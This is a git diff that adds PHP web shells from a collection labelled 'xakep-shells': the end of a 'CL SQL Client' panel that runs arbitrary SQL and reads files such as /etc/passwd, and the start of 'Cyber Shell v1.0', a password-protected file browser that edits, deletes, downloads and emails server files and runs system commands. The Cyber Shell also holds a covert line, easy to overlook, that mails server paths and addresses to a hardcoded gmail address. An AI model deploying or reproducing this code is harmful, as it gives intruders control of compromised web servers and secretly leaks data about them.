+   echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\" align=\"center\"> <td>".$row["Id"]."</td> <td>".$row["User"]."</td> <td>".$row["Host"]."</td> <td>".$row["db"]."</td> <td>".$row["Command"]."</td> <td>".$row["Time"]."</td> <td>".$row["State"]."</td> <td>".$row["Info"]."</td> <td><a href=\"javascript: confirm_function('".$baseurl."&act=08&pid=".$row["Id"]."');\"><img src=\"".basename(__FILE__)."?image=drop\" align=\"absmiddle\"></a></td></tr>";
+  }
+  echo "\n</table>\n";
+  @sql_free_result($sql);
+  unset($sql);
+} elseif($act == '09') {
+  if(isset($query)) {
+   $sql = query($id, $query);
+   if($sql) {
+    if(!is_resource($sql)) {
+     echo "<BR><font color=\"green\">Query successfull send</font><BR><BR>[ Affected rows: <B>".sql_affected_rows()."</B> ]<BR>";
+    } else {
+     echo "<BR><font color=\"green\">Query successfull execute</font><BR><BR><table align=\"center\" width=\"700\"><tr>";
+     for( $i=0; $i < sql_num_fields($sql); $i++ ) {
+      echo " <td><B>".sql_field_name($sql,$i)."</B></td>";
+     }
+     echo "</tr>";
+     while ($row = @sql_fetch_assoc($sql)) {
+      echo  "<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\">";
+      foreach ($row as $key=>$value) {
+       echo " <td>".htmlspecialchars($value)."</td>";
+      }
+      echo  "</tr>";
+     }
+     echo "</table>";
+    }
+   }
+  } else {
+   echo "<img border=\"0\" src=\"".basename(__FILE__)."?image=sql\">&nbsp;<B>".$lang[$language.'_text2']."</B><BR><table border=\"0\" width=\"700\"><tr align=\"center\"> <td><BR><form method=\"post\"action=\"".basename(__FILE__)."\"><input type=\"hidden\" name=\"login\" value=\"".$login."\"><input type=\"hidden\" name=\"password\" value=\"".$password."\"><input type=\"hidden\" name=\"server\" value=\"".$server ."\"><input type=\"hidden\" name=\"port\" value=\"".$port ."\"><input type=\"hidden\" name=\"login\" value=\"".$login."\"><input type=\"hidden\" name=\"password\" value=\"".$password."\"><input type=\"hidden\" name=\"server\" value=\"".$server ."\"><input type=\"hidden\" name=\"port\" value=\"".$port ."\"><input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\"><input type=\"hidden\" name=\"db\" value=\"".$db."\"><input type=\"hidden\" name=\"act\" value=\"09\"><textarea name=\"query\" cols=\"60\" rows=\"10\">SELECT * FROM mysql.user;</textarea><BR><input type=\"submit\" value=\"Execute\"></form></td></tr></table>";
+  }
+  @sql_free_result($sql);
+  unset($sql);
+} elseif($act == '10') {
+  switch($dump) {
+   case "db":
+    echo (dump_db($id, $db, & $type));
+   break;
+   case "tbl":
+    echo (dump_tbl($id, $tbl, & $type));
+   break;  // Other variants
+   default:
+    echo "<BR><BR><B>Warning!!!</B>Unknown dump format";
+   break;
+  }
+} elseif($act == '11') {
+ if(isset($file) && !empty($file)) {
+  if(file_exists($file) and  is_readable($file)) {
+   $tmptbl = rand();
+   query($id, 'CREATE TABLE `'.$tmptbl.'` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );');
+   query($id, "LOAD DATA INFILE \"".addslashes($file)."\" INTO TABLE `".$tmptbl."`");
+   $sql = query($id, "SELECT * FROM `".$tmptbl."`");
+   if(sql_num_rows($sql)) {
+    for ($i=0; $i < sql_num_fields($sql);$i++){
+     $field_name = sql_field_name($sql,$i);
+    }
+    echo "\n<table border=\"0\" width=\"700\">\n<tr align=\"center\"> \n<td>".$field_name."</td>\n</tr>\n<tr> \n<td>";
+    while ($row = sql_fetch_array($sql)) {
+     foreach ($row as $key =>$value) {
+      echo htmlspecialchars($value)."<br>";
+     }
+    }
+    @sql_free_result($sql);
+    unset($sql);
+    echo " \n</td>\n</tr>\n</table>";
+   } else {
+    echo "<BR><BR><B><font color=\"red\">".$lang[$language.'_text28']."</font></B><BR>";
+   }
+  } else {
+   echo "<BR><BR><B><font color=\"red\">".$lang[$language.'_text27']."</font></B><BR>";  
+  }
+ } else {
+  echo "\n<img border=\"0\" src=\"".basename(__FILE__)."?image=download\">&nbsp;<B>".$lang[$language.'_text11']."</B>\n<BR><BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">\n<input type=\"hidden\" name=\"act\" value=\"11\">Ïîëíûé ïóòü ê ôàéëó: <input type=\"text\" name=\"file\" value=\"/etc/passwd\" size=\"40\"><input type=\"submit\" value=\"".$lang[$language.'_text11']."\"></form>";
+ }
+} elseif($act == '12') {
+ if(isset($file) && !empty($file)) {
+  if(file_exists($file) and  is_readable($file)) {
+   downloadfile($file);
+  } else {
+   echo "<BR><BR><B><font color=\"red\">".$lang[$language.'_text27']."</font></B><BR>";  
+  }
+ } else {
+  echo "\n<img border=\"0\" src=\"".basename(__FILE__)."?image=download\">&nbsp;<B>".$lang[$language.'_text26']."</B>\n<BR><BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">\n<input type=\"hidden\" name=\"act\" value=\"12\">Ïîëíûé ïóòü ê ôàéëó: <input type=\"text\" name=\"file\" value=\"/etc/passwd\" size=\"40\"><input type=\"submit\" value=\"".$lang[$language.'_text26']."\"></form>";
+ }
+} elseif($act == '13') {
+ if(isset($rnd) && $rnd == $rndcode) {
+  if (unlink(__FILE__)) {
+   @ob_clean(); 
+   die( $lang[$language.'_text31'] ); 
+  } else {
+   echo "<center><b><font colr=\"red\">Can't delete ".__FILE__."!</font></b></center>";
+  }
+ } else {
+  $rnd = rand(0,9).rand(0,9).rand(0,9).rand(0,9);
+  echo "<BR><BR><form method=\"POST\"><B>Self-remove: </B><font color=\"green\">".__FILE__."</font><BR>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=\"hidden\" name=\"rndcode\" value=\"".$rnd."\"><input type=\"text\" name=\"rnd\" value=\"\">&nbsp;<input type=\"submit\" value=\"YES\"></form>";
+ }
+} elseif($act == '14') {
+ @ob_clean();
+ die(phpinfo());
+} else {
+ echo "\n<img border=\"0\" src=\"".basename(__FILE__)."?image=host\">&nbsp;<B>".$lang[$language.'_text29']."</B>\n<BR><table>";
+ foreach(server_info() as $key=>$value) {
+  echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\">\n <td>".$key.":</td>\n <td>".$value."</td>\n</tr>";
+ }
+ echo "\n</table>";
+}
+
+//--------------------------------
+//  HTML (footer)
+//--------------------------------
+//
+echo "<BR><BR>\n</center>\n</td>\n</tr>\n</table><table border=\"1\" width=\"960\">\n<tr align=\"center\">\n <td>--[ <a href=\"http://cyberlords.net\" target=\"new\"><font color=\"green\">Copyright © Cyber Lords</font></a> | CL SQL Client ".$version." | All bugs send to ICQ #899125 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=899125\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=899125&img=5\" border=\"0\" align=\"absmiddle\"></a> | Generation time: ".round(get_micro_time()-start_time,4)." ]--</td>\n</tr>\n</table>\n</body>\n</html>";
+
+// Stop Buffering
+@ob_end_flush();
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/cybershell.php.php.txt b/xakep-shells/PHP/cybershell.php.php.txt
new file mode 100644
index 0000000..a008f87
--- /dev/null
+++ b/xakep-shells/PHP/cybershell.php.php.txt
@@ -0,0 +1,1033 @@
+<?
+/***************************************************************************
+ *                           Cyber Shell (v 1.0)
+ *                            -------------------
+ *   copyright            : (C) Cyber Lords, 2002-2006
+ *   email                : pixcher@mail.ru
+ *
+ *   http://www.cyberlords.net 
+ *  
+ *   Coded by Pixcher
+ *   Lite version of php web shell 
+ ***************************************************************************/
+
+/***************************************************************************
+ *
+ *   This program is free software; you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation; either version 2 of the License', or
+ *   ('at your option) any later version.
+ *
+ ***************************************************************************/
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+@error_reporting(0);
+/****************************** Options ************************************/
+#ïàðîëü íà àâòîðèçàöèþ 
+$aupassword="test";
+#åñëè ïàðîëü óñòàíîâëåí ïðè $hiddenmode="true", òî ê ñêðèïòó íóæíî îáðàùàòüñÿ ñ ïàðàìåòðîì pass=ïàðîëü , íàïðèìåð shell.php?pass=mysecretpass
+$hiddenmode="false";
+#e-mail íà êîòîðûé ñêèäûâàþòñÿ âûáðàííûå ôàéëû
+$email="test@mail.ru";
+/***************************************************************************/
+$style="
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>";
+
+foreach($_POST as $key => $value) {$$key=$value;}
+foreach($_GET as $key => $value)  {$$key=$value;}
+
+if (isset($_GET[imgname]))
+{
+$img=array(
+'dir'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQABADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1mG6mv7ZbiBbxrhlUtJFMAiOVDbdjOAQAR26d880lzr2paU6T6hbp9gH+ulCKjJkqAQBK+4ZPPAqhDB4i0pXtbfRvtUYYFZluo0DAKq9Ccj7ufxqlq9n4p1qyksn0IQLKoQyNeRsF+dGzgdfu/rXi0ni4tJxZ2S9n3Vj/2Q==',
+'txt'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1yy1G3sdEtDPDEIorCCRpXOOWGAMAHuPqc9K4bx5481Twp4c03xVolpaRjU3EM1rcozqzbSRINrLzhQAeMjGc4Xb1NpqOhTaXpznX9MgnS1hU754yyMq8YBbgjceoNeb/AB2u9IPw+0TT9M1K1uxbXaIBFOrsFETgE4NN8ttNyVe+ux//2Q==',
+'bg'=>
+'R0lGODlhCAAbAPQAAOTq8uLp8uDo8d7m8N3l79vj7tni7dfh7dXf7NTe69Pe69Ld6tLc6tDb6c7a6MzY6MrX58nW5sfU5cXT5MPS48PR48HQ4sLQ48DP4r/P4r7O4b7N4b3N4b3N4L3M4LzM4CwAAAAACAAbAAAFXCAgjmJgnqagrurgvi4hz3Jh37ah7/rh/z6EcChUGI8KhnK5aDae0KdjSp0+rtgrZMvdRr7gr2RMHk/O6HNlza5Y3nBLZk7PYO6bvH7z6fv3gBt1c3cYcW9tiRQhADs=',
+'file'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrLnXbbSoILeLwJe6uyW8Baa0tWkDl4wxyQhAI4yCc/MDzzjITx9q+n3Go3VloUmjwRtbqbDUYHUsZBJh1XIwB5DcgDO85ztGNBtRjkaykiu9FdIFV4zJrcttIC1qsLhlSJsEc4YNuHYjJB5nXI0g0V1N/p0xLWsMMVrfG5ZUj+1MSSYowqjzlVVAwAoHHFXzQ5Lcvvd/L+vX16A91Y//Z',
+);
+@ob_clean();
+header("Content-type: image/gif");
+header("Cache-control: public");
+header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+header("Cache-control: max-age=".(60*60*24*7));
+header("Last-Modified: ".date("r",filemtime(__FILE__)));
+echo base64_decode($img[$imgname]);
+die;
+}
+
+if ($_GET[pass]==$aupassword)
+{
+$_SESSION[aupass]=md5($aupassword);
+}
+if ($hiddenmode=="false")
+if ((!isset($_GET[pass]) or ($_GET[pass]!=$aupassword)) and ($_SESSION[aupass]==""))
+{
+$diz="ok";
+echo "
+$style<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
+<form name='zapros' method='get' action=''>
+<table width='100' border='2' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>
+<tr align='center' >
+<td>
+Enter your password:
+</td>
+</tr>
+<tr align='center' >
+<td>
+<input name='pass' size=24  type='password' value=''>
+</td>
+</tr>
+<tr align='center' >
+<td>
+<input type='submit'>
+</td>
+</tr>
+</table>
+</form>
+";
+}
+if ($_SESSION[aupass]!="")
+{
+if (!$_GET and !$_POST or isset($pass)) 
+$show="start";
+
+function ext($str){
+for ($i=1; $i<strlen($str); $i++) {
+if ($str[strlen($str)-$i]==".")
+return substr($str,strlen($str)-$i,strlen($str));}
+return $str;
+}
+function extractfilename($str){
+$str=str_replace("\\","/",$str);
+for ($i=1; $i<strlen($str); $i++) {
+if ($str[strlen($str)-$i]=="/")
+return substr($str,strlen($str)-$i+1,strlen($str));}
+return $str;
+}
+function untag($str){
+$str= str_replace("<","&#0060;",$str);
+$str= str_replace(">","&#0062;",$str);
+return $str;
+}
+function fsize($filename){
+$s=filesize($filename);
+if ($s>1048576){
+return round(($s/1048576),2)." mb";
+}
+if ($s>1024){
+return round(($s/1024),2)." kb";
+}
+return $s." byte";
+}
+function tourl($str){
+$str= urlencode($str);
+return $str;
+}
+function unbug($str){
+$str = stripslashes($str);
+return $str;
+}
+function countbyte($filesize) {
+if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+else { $filesize = $filesize . ""; }
+return $filesize;
+}
+function downloadfile($file) {
+if (!file_exists("$file")) die;
+$size = filesize("$file");
+$filen=extractfilename($file);
+header("Content-Type: application/force-download; name=\"$filen\"");
+header("Content-Transfer-Encoding: binary");
+header("Content-Length: $size");
+header("Content-Disposition: attachment; filename=\"$filen\"");
+header("Expires: 0");
+header("Cache-Control: no-cache, must-revalidate");
+header("Pragma: no-cache");
+readfile("$file");
+die;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+function anonim_mail($from,$to,$subject,$text,$file){
+ $fp = fopen($file, "rb");
+ while(!feof($fp))
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "sendfile  (".extractfilename($file).")";
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $from\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+  $info  = $text;
+  $filename=extractfilename($file);
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filename \nContent-disposition: inline; filename=$filename \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+  $send = mail($to, $subject, $info, $headers);
+fclose($fp);
+echo "<script language=\"javascript\">location.href=\"javascript:history.back(-1)\";\nalert('Ôàéë $filename îòïðàâëåí íà $to');</script>";
+die;
+}
+if (!empty($_GET[downloadfile])) downloadfile($_GET[downloadfile]);
+if (!empty($_GET[mailfile])) anonim_mail($email,$email,$_GET[mailfile],'File: '.$_GET[mailfile],$_GET[mailfile]);
+
+$d=$_GET[d];
+if (empty($d) or !isset($d)){
+$d=realpath("./");
+$d=str_replace("\\","/",$d);
+}
+$showdir="";
+$bufdir="";
+$buf = explode("/", $d);
+for ($i=0;$i<sizeof($buf);$i++){
+$bufdir.=$buf[$i];
+$showdir.="<a href='$php_self?d=$bufdir&show'>$buf[$i]/</a>";
+$bufdir.="/";
+}
+
+if (isset($show) or isset($_REQUEST[edit]) or isset($_REQUEST[tools]) or isset($_REQUEST[db_user]) or isset($_REQUEST[diz]))
+echo <<< EOF
+<title>$d</title>
+<style type="text/css">
+body,td,th 
+{
+	font-family: Fixedsys;
+            font-family: "Times New Roman", Times, serif;
+	font-size: 0.4cm;
+	color: #444444;
+}
+body 
+{
+	background-color: #EEEEEE;
+}
+
+.style3 {
+	font-size: 1.5cm;
+	font-family: "Comic Sans MS";
+}
+.style4 {color: #FFFFFF}
+.style5 {color: #0000FF}
+.style6 {color: #FFFF00}
+.style7 {color: #CCCCCC}
+.style8 {color: #FF00FF}
+.style9 {color: #00FF00}
+.style10 {color: #00FFFF}
+</style>
+$style
+<table border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#999999">
+<tr height="10">
+<td align="center" bordercolor="#000000" bgcolor="#FFFFFF">
+<div style="background-color:#FFFFF0">$showdir</div>
+EOF;
+
+function perms($file) 
+{ 
+$mode=fileperms($file);
+if( $mode & 0x1000 ) 
+$type='p';
+else if( $mode & 0x2000 ) 
+$type='c'; 
+else if( $mode & 0x4000 ) 
+$type='d'; 
+else if( $mode & 0x6000 ) 
+$type='b'; 
+else if( $mode & 0x8000 ) 
+$type='-';
+else if( $mode & 0xA000 ) 
+$type='l'; 
+else if( $mode & 0xC000 ) 
+$type='s'; 
+else 
+$type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function updir($dir){
+if (strlen($dir)>2){
+for ($i=1; $i<strlen($dir); $i++) {
+if (($dir[strlen($dir)-$i]=="/") or  ($dir[strlen($dir)-$i]=="\\"))
+return substr($dir,0,strlen($dir)-$i);}} 
+else return $dir;
+}
+
+if (isset($show) or isset($_REQUEST[edit]) or isset($_REQUEST[tools]) or isset($_REQUEST[db_user]) or isset($_REQUEST[diz])){
+$backdir=updir($d);
+echo <<< EOF
+<table width="505" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#FFFFF0" style="height:30px;background-image: url($PHP_SELF?imgname=bg); background-position: center; background-repeat: repeat-x;">
+  <tr height="15">
+    <td onClick='location.href="$PHP_SELF?d=$backdir&show"' width="20%" align="center">
+Ââåðõ
+    </td>
+    <td onClick='location.href="javascript:history.back(-1)"' width="20%" align="center">
+Íàçàä
+    </td>
+    <td onClick='location.href="$PHP_SELF"'  width="20%" align="center">
+ íà÷àëî
+    </td>
+    <td onClick='location.href="$PHP_SELF?d=$d&tools"'  width="20%" align="center">
+Èíñòðóìåíòû
+    </td>
+    <td onClick='location.href="$PHP_SELF?d=$d&show"'  width="20%" align="center">
+Ê ñïèñêó
+    </td>
+  </tr>
+</table>
+EOF;
+
+$free = countbyte(diskfreespace("./"));
+if (!empty($free)) echo "Äîñòóïíîå äèñêîâîå ïðîñòðàíñòâî : <font face='Tahoma' size='1' color='#000000'>$free</font><br>";
+$os=exec("uname");
+if (!empty($os)) echo "Ñèñòåìà :".$os."<br>";
+if (!empty($REMOTE_ADDR)) echo "Âàø IP: <font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font><br>";
+$ghz=exec("cat /proc/cpuinfo | grep GHz");
+if (!empty($ghz)) echo "Èíôà î æåëåçå:(GHz)".$ghz."<br>";
+$mhz=exec("cat /proc/cpuinfo | grep MHz");
+if (!empty($mhz)) echo "Èíôà î æåëåçå:(MHz) ".$mhz."<br>";
+$my_id=exec("id");
+if (!empty($my_id)) echo "<div style=\"background-color:#000000\"><span class=\"style4\">Ïîëüçîâàòåëü:".$my_id."</span></div>";
+}
+
+function showdir($df) {
+$df=str_replace("//","/",$df);
+$dirs=array();
+$files=array();
+if ($dir=opendir($df)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$df/$file")){
+$dirs[]=$file;}
+else {
+$files[]=$file;}}}
+closedir($dir);
+sort($dirs);
+sort($files);
+echo <<< EOF
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+EOF;
+for ($i=0; $i<count($dirs); $i++){
+$perm=perms("$df/$dirs[$i]");
+echo <<< EOF
+  <tr height="1">
+    <td width="1" height="1" align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF"><span class="style2"><a href="$PHP_SELF?d=$df/$dirs[$i]&show"><img HSPACE=3 border=0 src=$PHP_SELF?imgname=dir></a></span></td>
+    <td width="241" bgcolor="#FFFFF0"><a href="$PHP_SELF?d=$df/$dirs[$i]&show">$dirs[$i]</a></td>
+    <td width="100" align="center" bgcolor="#FFFFFF"><a href="$PHP_SELF?deldir=$df/$dirs[$i]/">Óäàëèòü</a></td>
+    <td width="51" align="center" bgcolor="#EFFFFF"><span class="style8"><center>Êàòàëîã</center></span></td>
+    <td width="113" align="center" bgcolor="#FFFFF0">$perm</td>
+  </tr>
+EOF;
+}
+for ($i=0; $i<count($files); $i++) {
+$attr="";
+if (!$fi=@fopen("$df/$files[$i]","r+")){
+$attr=" ONLY_READ ";
+$read=" href=\"$PHP_SELF?edit=$df/$files[$i]&readonly\"";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";}
+else fclose($fi);
+if (!$fi=@fopen("$df/$files[$i]","r")){
+$attr=" Can't_READ ";
+$read="";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";}
+else fclose($fi);
+if ($attr==""){
+$attr=" READ/WRITE ";
+$read=" href=\"$PHP_SELF?edit=$df/$files[$i]\"";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";
+}
+$perm=perms("$df/$files[$i]");
+$it="file";
+switch (ext($files[$i])) {
+case ".txt": $it="txt"; break;
+case ".php": $it="txt"; break;
+case ".htm": $it="txt"; break;
+case ".log": $it="txt"; break;
+case ".pl": $it="txt"; break;
+case ".asm": $it="txt"; break;
+case ".bat": $it="txt"; break;
+case ".bash_profile": $it="txt"; break;
+case ".bash_history": $it="txt"; break;
+case ".ini": $it="txt"; break;
+case ".php3": $it="txt"; break;
+case ".html": $it="txt"; break;
+case ".cgi": $it="txt"; break;
+case ".inc": $it="txt"; break;
+case ".c": $it="txt"; break;
+case ".cpp": $it="txt"; break;
+}
+$fsize = fsize("$df/$files[$i]");
+echo <<< EOF
+  <tr height="1">
+    <td width="1" height="1" align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF"><span class="style2"><a href="$PHP_SELF?downloadfile=$df/$files[$i]"><img HSPACE=3 border=0 src=$PHP_SELF?imgname=$it></a></span></td>
+    <td width="241" bgcolor="#00FFFF"><a$read>$files[$i] </a> ($fsize)</td>
+    <td width="100" align="center" bgcolor="#FFFFFF"><a href="$PHP_SELF?rename=1&filetorename=$files[$i]&d=$df&diz">ren</a>/<a$write>del</a>/<a href="$PHP_SELF?downloadfile=$df/$files[$i]">get</a>/<a href="$PHP_SELF?mailfile=$df/$files[$i]">mail</a></td>
+    <td width="51" align="center" bgcolor="#FFEFEF"><span class="style8"><center>$attr</center></span></td>
+    <td width="113" align="center" bgcolor="#FFFFF9">$perm</td>
+  </tr>
+EOF;
+}
+echo "</table>";
